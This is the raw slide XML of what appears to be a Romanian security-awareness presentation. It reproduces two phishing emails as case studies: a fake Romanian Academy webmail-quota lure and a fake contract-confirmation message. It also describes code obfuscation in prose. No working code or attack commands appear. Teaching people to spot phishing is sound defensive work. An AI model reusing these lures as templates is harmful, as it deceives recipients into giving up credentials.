                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="586E7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775A41B-731C-B15F-5673-A9530D4413E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7381462" y="2510184"/>
            <a:ext cx="4111486" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Acest exemplu prezintă execuția unui cod criptat, unde instrucțiunile reale sunt ascunse într-o listă de valori numerice. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fiecare element este transformat în caracter, rezultând un script intermediar care la rândul lui decriptează codul final. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>În acest mod, logica programului devine vizibilă și executabilă doar la rulare. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Codul ascuns definește o funcție simplă de adunare, iar apelul s(10,20) returnează valoarea 30.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0BE49B-B313-881A-0E85-CDF2C55BD52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4421503" y="885890"/>
            <a:ext cx="7189305" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Diferența este că în exemplul anterior codul era doar camuflat simplu într-o listă de valori, pe când aici există un pas suplimentar: din lista numerică se generează un script intermediar care decriptează abia apoi codul final. Cu alte cuvinte, primul are un singur strat de mască, acesta are două straturi de ofuscare.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1344560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028944" y="1943099"/>
            <a:ext cx="568756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Phising</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cazuistică (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230112" y="2117664"/>
            <a:ext cx="5423368" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-----Original Message-----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From: Mail Delivery System [mailto:Mailer-Daemon@ns-1729.awsdns-24.co.uk]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sent: luni, 4 martie 2024 02:56</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To: user@acad.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subject: [SPAM] Mail delivery failed: returning message to sender [SPAM]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This message was created automatically by mail delivery software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  user@acad.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    host mail.acad.ro [213.177.29.83]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    SMTP error from remote mail server after pipelined MAIL FROM:&lt;user@acad.ro&gt; SIZE=8528:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    553 sorry, your envelope sender is not allowed (#5.7.1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="526328" y="2117664"/>
            <a:ext cx="5228296" cy="3939540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Stimate utilizator de webmail,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ați depășit cota de stocare a e-mailului. Nu vă mai puteți trimite e-mailul primit deoarece a fost impusă o restricție în contul dvs. Luați în considerare ștergerea e-mailurilor din dosarul Junk/Spam pentru a crea mai mult spațiu de stocare, după care vi se va cere să vă reactivați contul făcând clic pe linkul de verificare de mai jos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>De ce îmi va fi restricționat contul?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* Cota de stocare Mail depășită</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* Posibil acces neautorizat la cont.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* Încălcări ale acordului nostru de utilizare sau ale politicii de utilizare acceptabilă.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* Avem nevoie de informații despre tine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* Vă rugăm să verificați/validați e-mailul dvs. web prin intermediul site-ului nostru web securizat de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>REACTIVARE A SERVERULUI WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> făcând clic  pe linkul de mai jos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- verificare webmail -</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iar webmail-ul dvs. va fi reactivat imediat.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mulțumesc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IS&amp;T Service Birou | Serviciul de email Academia Română | Academia Română Autentificare Copyright © 2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="5422392"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96785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Phising</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cazuistică (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711750" y="40459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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Nexxon - Penta Andrei-Bela &lt;apenta@nexxon.ro&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sent:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Wednesday, April 17, 2024 9:05 AM</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> undisclosed-recipients:</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Documente DEV8759 - CONFIRMARE CONTRACTUL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26282A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Buna dimineata</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26282A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vă rugăm să găsiți documentul contractual atașat care a solicitat semnătura și sigiliul dumneavoastră ca confirmare.</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26282A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Aștept cu nerăbdare feedbackul dumneavoastră urgent.</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26282A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Salutari</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Penta Andrei - Bela</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sales representative utilaje agricole</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mobile: 0731 980 275</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="2B358B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>e-mail: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>apenta@nexxon.ro</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0896FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>525400 - Tg. Secuiesc</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>str. Garii nr. 48</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1000" b="0" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:effectLst/>
